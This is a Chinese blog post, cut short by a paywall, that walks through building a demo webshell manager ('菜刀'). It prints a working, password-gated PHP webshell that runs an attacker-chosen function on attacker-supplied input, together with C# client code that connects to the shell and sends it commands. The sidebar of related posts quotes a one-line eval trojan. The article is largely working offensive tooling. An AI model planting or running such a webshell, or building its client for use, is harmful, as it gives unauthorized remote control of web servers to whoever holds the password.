Demo版菜刀

最新推荐文章于 2023-04-09 00:19:17 发布
最新推荐文章于 2023-04-09 00:19:17 发布
阅读量301 收藏 2
点赞数
文章标签: c# 开发语言 PHP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hongduilanjun/article/details/126850897
版权

webshell:

<?php
@ini_set('display_errors','0');
if($_REQUEST['Ynife_verify'] == "verity" && $_REQUEST['Ynife_password'] == "pass"){
 echo "bingo";
}
if($_REQUEST['Ynife_password'] == "pass" && $_REQUEST['Ynife_verify'] == "run"){
 if($_REQUEST['Ynife_run_flag'] == "run"){
  loader($_REQUEST['loader'],$_REQUEST['Ynife_run_loader']);
 }else{
  loader($_REQUEST['Ynife_run_loader'],$_REQUEST['Ynife_run']);
 }
}
function loader($a,$b){
 $cc = run($b);
 $a($cc);
}
function run($b){
  return $b;
 }
?>

image.png

image.png

他叫我约妹子去了。那我就去了。。。

首先看到webshell如何判断是否连接成功,当$_REQUEST['Ynife_verify']为verity和$_REQUEST['Ynife_password']等于pass的时候echo一个bingo。师傅看到这里可以就会喷了哈哈哈哈我也觉得。因为后期会改造所以暂时先将就着试试水。

这里回到c#入口函数

Program.cs

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;


namespace Ynife
{
    internal class Program
    {
        static void Main(string[] args)
        {
            string url = args[0];
            string password = args[1];
            string res = SendData.PostRequest(url, password);
            if (res == "bingo")
            {
                Console.WriteLine("[+]connect success");
                SendExecuteCommand.SendCode(url, password);
            }
            else
            {
                Console.WriteLine("[-]connect failed");
            }
        }
    }
}

首先接受控制台url加密码其实就是$_REQUEST['Ynife_password']的值。然后通过SendData类的PostRequest方法发送。跟进PostRequest方法。

public static string PostRequest(string url,string password)
{
    string responseData = "";
    var client = new WebClient();
    WebProxy proxy = new WebProxy("127.0.0.1", 8080);
    client.Proxy = proxy;
    var data = new NameValueCollection();
    data["Ynife_password"] = password;
    data["Ynife_verify"] = "verity";
    byte[] sendData = Encoding.GetEncoding("GB2312").GetBytes(data.ToString());
    client.Headers.Add("ContentLength", sendData.Length.ToString());
    byte[] bytes = client.UploadValues(url, "POST", data);
    responseData = Encoding.UTF8.GetString(bytes);
    return responseData;
}

本地测试开启了8080代理,不用关闭就行。

测试下连接

image.png

最低0.47元/天 解锁文章
红队蓝军
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
获取Webshell的常用方法(一)
Captain_RB的博客
12-03 9763
Webshell是以php、asp、jsp等网站脚本文件形式存在的一种网页后门,攻击者可以利用web请求的方式,获得webshell,控制网站服务器,进而进行执行命令、上传下载文件等操作。本文主要介绍在渗透测试过程中获取Webshell的基本思路,实战中还需就地取材,灵活应对。
文件上传Webshell连接方法
saber的博客
04-19 5649
Webshell就是以asp.php.jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称为一种网页木马后门,攻击者可以通过这种网页后门获得网站服务器操作权限,控制网站服务器以进行上传下载文件, 查看数据库执行命令 通过服务器开放的端口获取服务器的某些权限。往目标网站中上传一句话木马,然后你就可以在本地通过Shell管理工具连接即可获取和控制整个网站目录。
webshell检测方法归纳
计算机科研杂货铺
08-17 3976
背景 webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 webshell检测模型 Webshell的运行流程:hacker -> HTTP Protocol -> Web Server -> CGI。简单来看就是这样一个
webshell 那些配置以及 具体的Demo
ZPeng_Yan的博客
06-02 1万+
Webshellweb”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为通过网站端口对网站服务器的某种程度上操作的权限。 一方面,webshell被站长常常用于网站管理、服务器管理等等,根据FSO权限的不同,作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。 另一方面,被入侵者利用,从而达到控制网站服务器的目的。这些网页脚本常称为WEB脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马与JSP脚本木
webshell 文件上传漏洞
m0_59049258的博客
04-09 299
webshell
caidao:golang本菜鸟级菜刀
05-16
菜鸟级golang菜刀 因为不想装java的环境... 那么大.. 所以就写了一个菜鸟级的golang菜刀小工具 安装 下载代码后 执行 go get -u github.com/astaxie/beego go get -u github.com/mattn/go-sqlite3 ( 注意这里需要gcc...
菜刀webshell流量数据包
08-01
菜刀webshell流量数据包
IVBD『PHP菜刀html开源』
11-11
【标题】"IVBD『PHP菜刀html开源』"所指的是一种基于PHPWeb后门工具,通常被安全研究人员用于模拟攻击测试或者进行网站安全审计。"PHP菜刀"是一个常见的名称,源于它能像刀一样切入系统,获取控制权。HTML则...
Xise19.9无视世界WAF.zip_菜刀
09-15
更新日志  生成内页修复生成内页内核,加速生成效率。  生成内页支持新闻采集模式,可选本地新闻或远程新闻。  生成内页支持防删功能。  生成内页支持批量操作,可数千shell不间断生成。...
python模拟菜刀反弹shell绕过限制【推荐】
09-19
主要介绍了利用python模拟菜刀反弹shell绕过限制,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
webshell
阳光梦的专栏
06-04 1448
漏洞原理                                                                                                 文件上传功能本身是一个正常的业务需求,对于网站来说,很多时候需要用户将文件上传到服务器,例如上传自定义头像,文件共享,发送邮件时添加附件,文件备份与恢复。所以“文件上传”本身没有问题,有
WebShell文件上传漏洞分析溯源(第2题)
qq_36933272的博客
09-04 127
上传一句话木马,发现只能上传jpg、png、gif文件格式 打开burpsuite,把php文件改为*.jpg格式,上传,在burpsuite截断上传的数据包 把上传的jpg文件后缀改为php,然后在burpsuite点击forward 木马上传成功,在uploads目录下 打开菜刀连接http://219.153.49.228:48433/uploads/muma.php 得到key ...
获取webshell的十种方法
weixin_30677475的博客
06-22 966
黑客在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。本篇文章将如何获取webshell总结成为了十种方法,希望广大的企业网络管理员能够通过了解获取webshell的途径,对企业自身进行防范。 一、通过上传文件类型过滤漏洞获取webshell 由于未采用白名单过滤文件类型,导致asa,cer,等文件类型,未进行限制,asa...
Webshell上传方式
悦分享
07-31 3773
某天公司的网络运维人员发现公司的业务系统遭到了攻击,被挂了木马,导致公司数据泄露,并且黑客留下了后门。Webshell,顾名思义web指的是在web服务器上,而shell是用脚本语言编写的脚本程序Webshell就是就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,可以对web服务器进行操作的权限,也可以将其称做为一种网页后门。............
php move_uploaded_file liunx,PHP move_uploaded_file() 函数(将上传的文件移动到新位置)
weixin_35702498的博客
03-10 409
定义和用法move_uploaded_file() 函数将上传的文件移动到新位置。若成功,则返回 true,否则返回 false。语法move_uploaded_file(file,newloc)参数描述file必需。规定要移动的文件。newloc必需。规定文件的新位置。说明本函数检查并确保由 file 指定的文件是合法的上传文件(即通过 PHP 的 HTTP POST 上传机制所上传的)。如果文...
上传webshell并获取数据库密码
qq_43776408的博客
05-20 1145
因为此处用的菜刀是java的 所以你要搭建java环境 然后通过xshell上传菜刀 上传完之后,由于你上传的是jar文件 所以打开方式要注意 菜刀让你填密码 这个密码就是你在一开始上传上去的 回去看 点击添加 成功 最后我们上传webshell 上传成功后可以在任何机器访问shell 如果我们想要知道数据库密码 先找到config目录 下面有一个文件叫config_global,打开它。里面就有密码 结束 ...
webshell上传技术
热门推荐
Jim的博客
08-16 1万+
中国菜刀连接一句话木马 1.上传一句话木马,记录木马地址:http://192.168.1.3:8080/up/images/lubr.php  一句话木马:asp的一句话是:    php的一句话是: 2.菜刀连接 进入中国菜刀目录,点击chopper.exe 右键点击添加,在地址栏中添加上传文件路径,右侧添加密码lubr, 脚本类型为PHP 右键点击文件管理,查看目标服务器的完整目
中国蚁剑+burpsuite+webshell文件上传(超完整)
qq_50953689的博客
05-14 2673
之前:需要打开phpstudy的靶场环境 第一步 ➊准备木马文件 新建木马文件ttx.php,文件内容为 <?php @eval($_REQUEST["shell"]); ?> ➋保存后,将文件后缀名php改为jpg ➌登录dvwa测试环境,将security等级改为‘low’(其它模式,后端也做了校验,无法完成第⑤步的操作),然后打开文件上传模块 ➍上传文件,选择第②步保存的shell.jpg,在点击‘Upload’之前,打开burpsuite拦截功能并且点击‘Upl
buuctf菜刀666
最新发布
09-26
buf菜刀666是一个用于网络安全竞赛中的题目。根据引用中的描述,buuctf菜刀666是一个HTTP流量的题目。你可以在应用显示过滤器中输入http,查看统计里的http请求,进一步分析并解决这个题目。根据引用,你可能需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值